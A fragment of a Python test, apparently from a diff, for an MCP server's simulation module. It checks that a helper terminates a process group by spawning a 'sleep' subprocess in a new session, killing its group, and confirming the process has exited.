from mcp_server.skills.simulation import operations as ops + + if not hasattr(os, "getpgid"): + pytest.skip("POSIX process groups not available") + p = subprocess.Popen(["sleep", "60"], start_new_session=True) # noqa: S607 + try: + assert os.getpgid(p.pid) == p.pid, "start_new_session should make pid the group leader" + ops._kill_process_group(p.pid) # SIGTERMs the group and reaps the leader + deadline = time.time() + 5 + while psutil.pid_exists(p.pid) and time.time() < deadline: + time.sleep(0.1) + assert not psutil.pid_exists(p.pid), "session-leader survived group kill" + finally: + with _ctx.suppress(Exception): + p.kill() + with _ctx.suppress(Exception): + p.wait(timeout=2)